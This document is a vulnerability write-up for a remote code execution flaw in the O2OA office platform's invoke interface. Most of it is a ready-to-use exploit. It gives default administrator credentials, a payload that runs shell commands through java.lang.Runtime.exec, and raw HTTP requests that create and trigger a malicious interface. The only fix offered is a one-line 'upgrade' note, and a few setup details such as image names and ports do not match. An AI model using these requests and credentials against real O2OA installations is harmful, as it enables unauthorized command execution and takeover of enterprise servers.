Vulnerability Overview
O2OA is an open-source and free enterprise and team office platform that provides four major platforms: portal management, process management, information management, and data management. It integrates multiple functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration to meet various management and collaboration needs of enterprises. The O2OA system has a remote code execution vulnerability in the invoke interface. Attackers can exploit this vulnerability to execute arbitrary code.
Scope of Impact
Title: "O2OA"
CNVD-2020-18740
Exploitation Process
Pull the environment using Docker
docker pull oxnme/o2oa:6.1.3
docker run --name o2server -p 80:80 -p 20010:20010 -p 20020:20020 -p 20030:20030 -d o2oa/o2server
Weak password: xadmin/o2oa@2022
After setting up the environment, directly access port 8001 through a browser, and it will automatically redirect to the O2OA login page.
http://192.168.31.151:8001/x_desktop/index.html
Enter the default password, xadmin/o2, to log in successfully.
Note: The default password for the new version of O2OA is: xadmin/o2oa@2022
Find service management
Add interface configuration
Enter the content of the execution command as follows.
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));
var result = [];
while (true) {
var oneline = bufReader.readLine();
result.push(oneline);
if (!oneline) break;
}
var result = { "Result": result };
this.response.setBody(result, "application/json");
You can also create interface configuration through the following request package.
The request package is as follows:
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Execute the command directly.
The request package is as follows:
POST 192.168.31.151:20030/x_program_center/jaxrs/invoke/cmd/execute
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Different commands require creating different interface configurations.
Recommended Fixes
Upgrade the version
References